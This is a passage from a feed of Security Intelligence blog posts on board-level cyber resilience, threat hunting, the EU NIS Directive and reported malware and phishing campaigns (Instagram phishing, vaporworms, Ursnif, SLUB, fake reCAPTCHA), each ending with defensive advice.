  • How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
  • How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and sharing of threat information and best practices is key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyber attacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

Hunting for the True Meaning of Threat Hunting at RSAC 2019

After my first-ever RSA Conference experience, I returned to Boston with a lot of takeaways — not to mention a week’s worth of new socks, thanks to generous vendors that had a more functional swag approach than most. I spent the majority of my time at RSAC 2019 at the Master Threat Hunting kiosk within the broader IBM Security booth, where I told anyone who wanted to listen about how we use methodologies and tools from the military and intelligence communities to fight cyberthreats in the private sector. When I wasn’t at the booth, I was scouring the show floor on a hunt of my own — a hunt for the true meaning of threat hunting.

Don’t Believe the Hype: 3 Common Misconceptions About Threat Hunting

At first glance, the results of my hunt seemed promising; I saw the term “threat hunting” plastered all over many of the vendors’ booths. Wanting to learn more, I spoke with the booth personnel about their threat hunting solutions, gathered a stack of marketing one-pagers and continued on my separate hunt for free socks and stress balls.

After digesting the information from booth staff and digging into the marketing materials from the myriad vendors, I was saddened to learn that threat hunting is becoming a full-blown buzzword.

Let’s be honest: “Threat hunting” certainly has a cool ring to it that draws people in and makes them want to learn more. However, it’s important not to lose sight of the fact that threat hunting is an actual approach to cyber investigations that has been around since long before marketers starting using it as a hook.

Below are three of the most notable misconceptions about threat hunting I witnessed as I prowled around the show floor at RSAC 2019.

1. Threat Hunting Should Be Fully Automated

In general, automation is great; I love automating parts of my life to save time and to make things easier. However, there are some things that can’t be fully automated — or shouldn’t be, at least not yet. Threat hunting is one of those things.

While automation can be used within various threat hunting tools, it is still a very manual, human-led process to proactively (and reactively) hunt for unknown threats in your network that may have avoided your rules-based detection solutions. Threat hunting methodologies were derived from the counterterrorism community and repurposed for cybersecurity. There’s a reason why we don’t fully automate counterterrorism analysis, and the same applies to cyber.

2. Threat Hunting and EDR Are One and the Same

This was the most common misconception I encountered while searching for threat hunting solutions at RSAC. It went something like this: I would go into a booth, ask to learn more about the vendor’s threat hunting solution and come to find that what’s actually being marketed is an endpoint detection and response (EDR) solution.

EDR is a crucial piece of threat hunting, but these products are not the only tools threat hunters use. If threat hunting was as easy as using an EDR solution to find threats, we would have a much higher success rate. The truth is that EDR solutions need to be coupled with other tools, such as threat intelligence, open-source intelligence (OSINT) and network data, and brought together in a common platform to visualize anomalies and trends in the data.

3. Threat Hunting Is Overly Complicated

All of the marketing and buzz around threat hunting has overcomplicated what it actually is. It’s not one tool, it’s not automated, it’s not an overly complicated process. It takes multiple tools and a ton of data, it is very much dependent on well-trained analysts that know what they’re looking for, and it is an investigative process just like counterterrorism and law enforcement investigations. Since cyber threat hunting mirrors these investigative techniques, threat hunters should look toward trusted tools from the national security and law enforcement sectors.

What Is the True Meaning of Cyber Threat Hunting?

Don’t get me wrong — I am thrilled that threat hunting is gaining steam and vendors are coming up with innovative solutions to contribute to the definition of threat hunting. As a former analyst, I define threat hunting as an in-depth, human-led, investigative process to discover threats to an organization. My definition may vary from most when it comes to how this is conducted, since most definitions emphasize that threat hunting is a totally proactive approach. While I absolutely agree with the importance of proactivity, there aren’t many organizations that can take a solely proactive approach to threat hunting due to constraints related to budget, training and time.

While not ideal, there is a way to hunt reactively, which is often more realistic for small and midsize organizations. For example, you could conduct a more in-depth cyber investigation to get the context around a cyber incident or alert. Some would argue that’s just incident response, not threat hunting — but it turns into threat hunting when an analyst takes an all-source intelligence approach to enrich their investigation with external sources, such as threat intelligence and social media, and other internal sources of data. This approach can show the who, what, where, when and how around the incident and inform leadership on how to take the best action. The context can be used to retrain the rules-based systems and build investigative baselines for future analysis.

The Definition of Threat Hunting Is Evolving

Cyber threat hunting tools come in all shapes and sizes, but the most advanced tools allow you to reactively and proactively investigate threats by bringing all your internal and external data into one platform. By fusing internal security information and event management (SIEM) data, internal records, access logs and more with external data feeds, cyber threat hunters can identify trends and anomalies in the data and turn it into actionable intelligence to address threats in the network and proactively thwart ones that haven’t hit yet.

Behind the buzz and momentum from RSAC 2019, threat hunting will continue to gain traction, more advanced solutions will be developed, and organizations will be able to hunt down threats more efficiently and effectively. I’m excited to see how the definition evolves in the near future — as long as the cyber threat hunting roots stay strong.

Read the “SANS 2018 Threat Hunting Results” report

The post Hunting for the True Meaning of Threat Hunting at RSAC 2019 appeared first on Security Intelligence.

Threat Actors Use Fake Copyright Infringement Notifications in Instagram Hacking Campaign

Security researchers discovered that attackers are using fake copyright infringement notifications to hack Instagram influencer accounts.

Detected by Kaspersky Lab, the Instagram hacking campaign involves threat actors sending Instagram influencers fraudulent emails claiming that the social media network intends to permanently delete their account for copyright infringement. The attack email uses the social networking service’s official header and logo to deceive victims. It even originates from an email address — or — that looks similar to Instagram’s actual support email,

Using these disguises, the email notifies targeted users that they have 24 hours to verify their account before it is deleted. Clicking on the email’s “Review complaint” button redirects users to a phishing page where they can supposedly appeal the decision to delete their profile.

At that point, users can proceed by clicking an “Appeal” link and submitting their Instagram credentials to the attackers. The scam then asks users to verify their email address by choosing their email provider and entering the login credentials for their account.

Just the Latest Instagram Hacking Attack

This is just the latest scam to target Instagram users. Back in August 2018, for instance, Mashable reported on a string of hacks in which threat actors took over users’ accounts and added a .ru email address to their profiles. News of another attack wave came a month later when Motherboard reported that attackers had hijacked at least four high-profile Instagrammers’ accounts and extorted them for money.

Most recently, Trend Micro detected yet another scam operation in February 2019 in which fraudsters targeted Instagram users with the false promise of a “verified” badge for their accounts.

How to Defend Against Phishing Attacks

Security professionals can help defend their organizations against phishing attacks by using ahead-of-threat detection to block potential phishing domains, even those that threat actors have cloned to look like legitimate websites.

Security teams should also test their phishing defenses by conducting a simulated phishing engagement. Organizations can then use this exercise to identify employees who need more training on social engineering attacks as well as to conduct follow-up testing for the entire workforce.

The post Threat Actors Use Fake Copyright Infringement Notifications in Instagram Hacking Campaign appeared first on Security Intelligence.

Will We See the Rise of Vaporworms and Other New Fileless Attacks in 2019?

The evolution of the new and difficult-to-detect category of fileless attacks may soon take an insidious turn with the development of what some researchers are calling vaporworms.

As the name suggests, fileless malware differs from conventional malware in that it doesn’t require a file to be created and saved on a computer. Instead, it leverages scripts or even legitimate running processes to inject itself directly into a device’s memory. But what’s on the horizon for this emerging threat?

The Threat of Fileless Attacks

Trend Micro first reported on a fileless payload with wormlike replication capabilities in November 2018. The malware, a fileless version of the Bladabindi backdoor, avoided detection by depositing its payload in the Windows registry, which is a key-value database that exists only in Windows memory. It then created another registry entry that instructed Windows to load it at boot time. Because the entire process took place in memory, it didn’t leave a trail on the infected computer’s hard disk drive.

The emergence of vaporworms indicates that fileless malware has now taken on self-propagating capabilities, a development that could greatly magnify its impact. However, the only vaporworms that have been detected so far in the wild propagate by installing copies of themselves on removable storage devices, such as flash drives and external disk drives. This enables them to spread without leaving a trace on the host’s primary storage media. Every time an infected drive is plugged into a new machine, the infection cycle begins again. This is a fairly primitive form of propagation, but a potentially disturbing harbinger of things to come.

This kind of threat can be detected, but not with conventional anti-malware products that work by matching files stored on disks to known malware signatures. Since this new kind of malware never saves a copy of itself to a disk, it can’t be detected by these more traditional scanners. Unfortunately, detection currently must take place after the fact, and an intruder can do a lot of damage if the attack is not intercepted early.

An Old Nemesis Reinvented

Fileless attacks actually aren’t new — the Code Red worm that infected nearly 360,000 Microsoft Internet Information Services servers in 2001 was an early version of a fileless threat — but the concept has re-emerged over the past couple years with a focus on endpoint devices. According to SentinelOne, fileless attacks rose by 94 percent in the first half of 2018. Given how efficiently threat actors can compromise endpoints using this tactic, the threat of fileless malware shows no signs of slowing down.

Trend Micro’s discovery of a variation of the well-known Bladabindi backdoor alarmed many security researchers. Analysts found an open-source scripting tool that worked with PowerShell to compile itself into a single executable file that installed the malware, modified the registry and installed hidden copies of itself on removable media. This made it both difficult to detect and easy to spread.

“The worm’s payload, propagation, and technique of filelessly delivering the backdoor in the affected system make it a significant threat,” wrote Trend Micro’s Carl Maverick R. Pascual.

It was the self-replication features that gave birth to the term vaporworms. Once malware acquires the ability to infiltrate network shares, it can spread at exponential speed. Some researchers have drawn analogies to the WannaCry/WanaCrypt0r 2.0 ransomware attack of 2017, which hit organizations in more than 100 countries in just 48 hours.

When it Comes to Vaporworms, You Can’t Be Too Cautious

So far, there is no evidence that any fileless variants use networks to replicate, but the possibility should have enterprise security teams on high alert. For now, the best protection is to closely monitor the use of removable storage devices, double down on endpoint security and restrict the use of tools like PowerShell.

While conventional anti-malware protection may not detect in-memory signatures, makers of those tools are continually evolving their products to adapt to new threats. In the meantime, security professionals should use intrusion prevention systems to look for signs of vaporworm damage and limit the rate of infection. Endpoint detection solutions can also monitor for suspicious activity that indicates the presence of a backdoor Trojan.

The nightmare scenario is that fileless malware merges with ransomware to create a highly malicious and almost undetectable vaporworm threat that can infect entire enterprise networks in a matter of minutes. There’s no indication this has happened yet, but as is always the case with cybersecurity, you can’t be too cautious.

The post Will We See the Rise of Vaporworms and Other New Fileless Attacks in 2019? appeared first on Security Intelligence.

Breaking Down the Incident Notification Requirements in the EU’s NIS Directive

Our society relies on the availability, security and reliability of network and information systems (NIS). Various security frameworks provide standards and guidance as to which measures organizations should implement to protect IT systems and increase resilience. However, since such recommendations are not ingrained as actual laws in most countries, these best practices and guidelines are often followed solely on a voluntary basis.

This is contrary to the European Union (EU)’s NIS Directive; a legislation that sets a range of network and information security requirements to augment IT security across all EU member states. While the directive covers a few different domains, including preparedness, cross-EU collaboration and incident response (IR), one of its main pillars focuses on breach notification requirements.

In this post, we will focus specifically on the aspects of incident notification contained in the NIS Directive as they apply to operators of essential services (OES).

Regulations Versus Directives

The NIS Directive is a different type of legal act compared to, say, the General Data Protection Regulation (GDPR). The latter is immediately applicable and enforceable by law in all member states. A directive is somewhat different.

While it also applies to all member states, instead of being immediately applicable, it sets goals, requirements and results that must be achieved. It is then up to each member state to devise its own laws on how to reach these goals and what types of penalties noncompliance will carry. The NIS Directive also sets a floor. There can be greater requirements applicable based on the organization’s industry sector and member state(s) it operates in.

This legal status reveals one of the possible issues with a directive: Whereas a regulation is direct law, a directive needs to be transposed into local laws by each member state. These transpositions can result in differences in the implementation of the directive into law, in some cases complicating matters for organizations that operate across borders.

Variance in Incident Notification Definitions

One of the articles in the NIS Directive that has received a lot of attention is Article 14, which outlines requirements for security and incident notification. It stipulates that member states must ensure that OES notify the national competent authority and the national computer security incident response team (CSIRT) in case of an incident that significantly impacts the continuity of an essential service. This is not entirely new — depending on the type of activity or sector, there are already requirements for incident reporting in Europe, including Article 13a of the Telecom Framework Directive.

An additional element of complexity is that, according to Article 5, the identification of OES per sector needs to happen individually within each member state. Although organizations might give input to this process, the actual identification is out of their hands. This process is another way by which the directive could result in various interpretations that end up adding complexity.

The Benefits of Incident Notification

One of the drivers for notification in the context of the directive is to be compliant with legal requirements. However, if the starting point of your organization is to only comply with the bare minimum of these notification requirements, then you will miss out on the opportunities provided by the directive.

Additionally, the bulk of these requirements, including notification and detection capabilities, should already be covered in large part by your existing security environment. If this is not the case, you can use the NIS Directive as a wake-up call to improve your security posture.

From a policymaker’s point of view, the notification requirements can help better identify the challenges within a sector and propose mitigation measures that are based on actual facts and figures. These facts and figures can then be used by CSIRTs (or a responsible authority) to provide more relevant warnings and situation reports together with sector-specific threat intelligence. Similarly, this information can also be used to evaluate cross-border impact of incidents or threats and optionally notify other member states.

Breaking Down Notification Requirements

Now, let’s dive into some details of the NIS Directive. There are essentially three main parts to the notification requirement.

First, prior to notification, organizations need to be able to detect security incidents — i.e., they must possess appropriate detection capabilities. The second part involves defining what a significant incident is and what risks, either directly or indirectly, can have significant impact on an essential service. The last part of the notification requirement involves understanding when, what, how and to whom organizations must report incidents.

First Things First — Detection

Every notification starts with proper detection of an incident. You can find guidelines on detection capabilities in a reference publication from the NIS Cooperation Group on security measures.

The core principles for these security measures include being effective, tailored, compatible, proportionate, concrete, verifiable (evidence of the effective implementation of security policies) and inclusive (includes all security domains that may contribute to reinforcing cybersecurity).

Applying NIS measures to the domain of detection and resilience can be done by:

  • Setting up a detection system to analyze files and protocols — this can include, for example, network intrusion detection systems (NIDSs) or malware sandboxes;
  • Enabling logging on critical systems (log entries should include time stamps);
  • Collecting the logs centrally; and
  • Conducting log correlation and analysis on the events coming from critical systems.

All of the above actions can also be automated with a security information and event management (SIEM) solution.

After Detection — Defining Incidents

But what, exactly, is a security incident? Article 4 defines it as any event that has an actual “adverse effect” on the security of network and information systems. As a side note, the directive does not include a definition of what is covered by “adverse.”

Based on the information from the NIS Cooperation Group, we can combine the definition of an incident with the definition of security of network and information systems. This would redefine an incident to be any event that affects the authenticity, confidentiality, integrity or availability of network and information systems, and has a significant impact on the continuity of the essential service itself.

What Is a Significant Incident?

A set of three parameters from Article 14 of the NIS Directive can be used to determine what is considered a significant incident:

  • The number of users that are affected by the disruption of the essential service.
  • The duration of the incident.
  • The geographic spread of those affected by the incident.

Additionally, the parameters from Article 6 are also helpful in defining what qualifies as a significant incident:

  • What is the dependency of other OES on the service affected by the incident?
  • What is the impact (degree, duration) on economic and social activities or on public safety? In particular, the impact on social activities can be hard to measure for OES.
  • How large is the market share of the affected service?
  • What is the geographic spread that could be affected?
  • How important is the affected element for maintaining a sufficient level of service?

In general, these parameters are most often already included in what OES are accustomed to using to define crises within their services that are unrelated to IT.

The actual criteria, thresholds and parameters for determining substantial incidents are defined by member states. This can include the parameters defined in the NIS Directive, possibly extended with other states or by sector-specific criteria.

The Directive’s Notification Timeline

According to Article 14, organizations need to notify without undue delay, although this timeline can be shortened or specified based on the member state. The term “undue” can also be subjective, but in most cases, this means the organization must send a preliminary notification whenever an incident is first detected, even if all the details are not available yet. The goal is to raise awareness. As your investigation progresses, you can provide intermediate follow-ups, and when the incident is closed, you can provide a full report.

It’s fairly simple to implement this step. Your IR plan should already include a notification and escalation path for certain types of critical incidents during the detection and analysis phases. It should also foresee a final incident report as part of the lessons-learned phase.

In essence, this requirement is an extension of an already established IR plan and recovery process.

Where to Report?

Each member state is free to choose its own reporting framework. This can be the national authority, sectorial authorities or a combination of both in addition to notifying the national CSIRTs.

As an organization, it is important to identify to whom you have to report, exchange contact details between your security team and the notification body, and establish and test this communication process.

Use the NIS Directive as an Opportunity

Similar to the GDPR, you can approach this directive as a roadblock or a nuisance, or you can consider it an excellent opportunity to improve your security posture. The fact that some security requirements are legal requirements can help you further establish your security program.

There are many articles in the directive to take into account, but you should start by focusing on the following:

  • Article 4, which defines a security incident;
  • Article 5, which mandates that member states should identify OES;
  • Article 6, which sets additional parameters to define significant incidents; and
  • Article 14, which requires you to implement security measures and notification processes. This article also contains the three base parameters to define what is a significant incident and describes the accepted delay for notifications.

Unfortunately, despite the fact that the bulk of the NIS Directive has been well-known for quite some time, not all EU member states have finalized the phase of transposing the recommendations into actual laws.

If this is the case for your environment, you might benefit from the situation and provide your lawmakers with input for security measures that would actually improve the level of security for network and information systems in your sector.

The post Breaking Down the Incident Notification Requirements in the EU’s NIS Directive appeared first on Security Intelligence.

Threat Actor Targets Japanese Users With New Ursnif Variant

Security researchers discovered an attack campaign targeting Japanese users with a new variant of Ursnif banking malware.

First observed in the beginning of 2019, Cybereason reported that the campaign begins with a phishing email that attempts to trick unsuspecting Japanese users into enabling a weaponized Microsoft Office document’s embedded macros. This results in the execution of several PowerShell commands that, in turn, download an image file. The image uses steganography to hide Bebloh, malware that ultimately pulls down Ursnif’s loader from the attacker’s command-and-control (C&C) server.

The campaign’s final payload differs from previous variants in that it:

  • Creates “last-minute persistence” the moment before an infected system shuts down and injects its core dynamic link library (DLL) into explorer.exe once the machine reboots;
  • Comes with updated modules for stealing credentials from Outlook, Mozilla Thunderbird and Internet Explorer;
  • Has a new module that enables it to steal from cryptocurrency wallets and disk encryption software; and
  • Uses yet another module to evade PhishWall, a Japanese security product.

A Busy Few Months for Ursnif

This isn’t the first time cyberattackers have targeted Japanese users with Bebloh and Ursnif. In August 2018, for instance, Trend Micro detected a campaign in which threat actors used the Cutwail botnet and abused internet query files to distribute the threats. Just two months later, Trend Micro analyzed a similar operation spreading both types of malware.

Ursnif has also been busy without Bebloh. For example, Carbon Black reported on an attack campaign on Jan. 24 in which malicious actors used macros and a PowerShell script to download the malware along with GandCrab ransomware. That same day, Cisco Talos uncovered a fileless operation involving Ursnif. Then, the following month, Bromium detected a sample of the malware hidden within an image of Mario, the popular Nintendo character.

How to Detect Banking Malware Campaigns

Security professionals can defend against campaigns that spread Ursnif and other banking malware by using ahead-of-threat detection to analyze the WHOIS information of potential phishing sites. Organizations should also make use of analytics tools such as VBA editor to inspect the macro code in suspicious Office documents.

The post Threat Actor Targets Japanese Users With New Ursnif Variant appeared first on Security Intelligence.

SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack

Security researchers have discovered that the new SLUB backdoor is receiving attack commands from GitHub and relying on Slack for communicating with its attackers.

Trend Micro detailed how this malware campaign began with watering hole attacks that redirected users to webpages hosting malicious code. The campaign proceeded with infection whenever these attacks caught someone with a machine that was not secured from CVE-2018-8174, a VBScript engine vulnerability patched by Microsoft back in May 2018.

Upon exploitation, the attack downloaded a dynamic-link library (DLL) and ran a PowerShell command. This process loaded a downloader that, in turn, downloaded and ran a second executable file containing the SLUB backdoor.

Detected as Backdoor.Win32.SLUB.A, the SLUB backdoor is a threat written in C++ that stands out for two reasons:

  • First, it embeds two authorization tokens to communicate with Slack’s application programming interface (API).
  • Second, it downloads a gist snippet from GitHub and parses it to search for commands.

The backdoor uses these two steps to post the result of its commands in a private Slack channel within a workspace using the embedded tokens. With this flow in place, digital attackers can use SLUB to take screen captures, create archive files and exfiltrate information.

The Ongoing Relevance of Watering Hole Attacks

This campaign isn’t the only recent operation to use watering hole attacks. For example, ESET detected one such campaign in November 2018, in which the OceanLotus group used watering hole attacks to target several websites in Southeast Asia. Several months later, ESET reported that the APT LuckyMouse group had preyed on the International Civil Aviation Organization using a watering hole attack.

These incidents illustrate how watering hole attacks pose an ongoing threat to organizations. Indeed, Carbon Black found that more than one-fifth (21 percent) of financial services companies had recently experienced this type of attack. Threat actors could use a successful attack in those cases to steal money and undermine customer trust in the financial institutions.

How to Defend Against Threats Like the SLUB Backdoor

Security professionals can defend against digital threats like the SLUB backdoor by using a layered security approach. This strategy should include machine learning and threat detection sandboxing to strengthen endpoint defenses against emerging threats, such as fileless malware.

Organizations should also practice risk-based vulnerability management to prioritize the software security flaws they should patch first.

The post SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack appeared first on Security Intelligence.

Phishing Campaign Uses Fake Google reCAPTCHA to Distribute Malware

A recent phishing campaign used a fake Google reCAPTCHA as part of its efforts to target Polish bank employees with malware.

Sucuri researchers discovered that the campaign sent out malicious emails masquerading as a confirmation for a recent transaction. Digital attackers deployed this disguise in the hopes that employees at the targeted bank would click on a link to a malicious PHP file out of alarm. That file was responsible for loading a fake 404 error page for visitors that had specifically defined user-agents.

If passed through a user-agent filter, the PHP code loaded a fake Google reCAPTCHA. This feature used static HTML and JavaScript, so was not capable of rotating the individual images used in each authentication test. It also did not support audio replay.

At that point, the PHP code checked the victim’s browser user-agent to determine what payload it should deliver. If it found the victim was using an Android device, the attack would load a malicious APK file capable of intercepting two-factor authentication (2FA) codes. Otherwise, it would download a malicious ZIP archive.

A History of Abusing and Bypassing CAPTCHAs

This isn’t the first time threat actors have incorporated CAPTCHAs into their attack campaigns. Back in 2016, researchers at the University of Connecticut and Bar Ilan University identified a malicious attack in which threat actors could trick users into divulging some of their personal information by completing a fake CAPTCHA. In February 2018, My Online Security observed a campaign that used an image pretending to be a Google reCAPTCHA to download a malicious ZIP file.

Malefactors have also tried to bypass legitimate CAPTCHAs for the purpose of conducting attack campaigns. All the way back in 2009, for example, IT World reported on a worm named Gaptcha that circumvented Gmail’s authentication feature to create new dummy accounts from which to send spam mail. More recently, BullGuard discovered some survey scams using CAPTCHAs to make their ploys more believable.

Defending Against Fake reCAPTCHA Phishing Campaigns

Security professionals can help protect their organizations from fake reCAPTCHA-wielding phishing campaigns by taking an ahead-of-threat approach to detection. Companies should also reject SMS-based 2FA schemes in favor of more practical and convenient multifactor authentication (MFA) deployments that fit into a context-based access strategy.

The post Phishing Campaign Uses Fake Google reCAPTCHA to Distribute Malware appeared first on Security Intelligence.

Most attacks against energy and utilities occur in the enterprise IT network

The United States has not been hit by a paralyzing cyberattack on critical infrastructure like the one that sidelined Ukraine in 2015. That attack disabled Ukraine's power grid, leaving more than 700,000 people in the dark.

But the enterprise IT networks inside energy and utilities networks have been infiltrated for years. Based on an analysis by the U.S. Department of Homeland Security (DHS) and FBI, these networks have been compromised since at least March 2016 by nation-state actors who perform reconnaissance activities looking industrial control system (ICS) designs and blueprints to steal.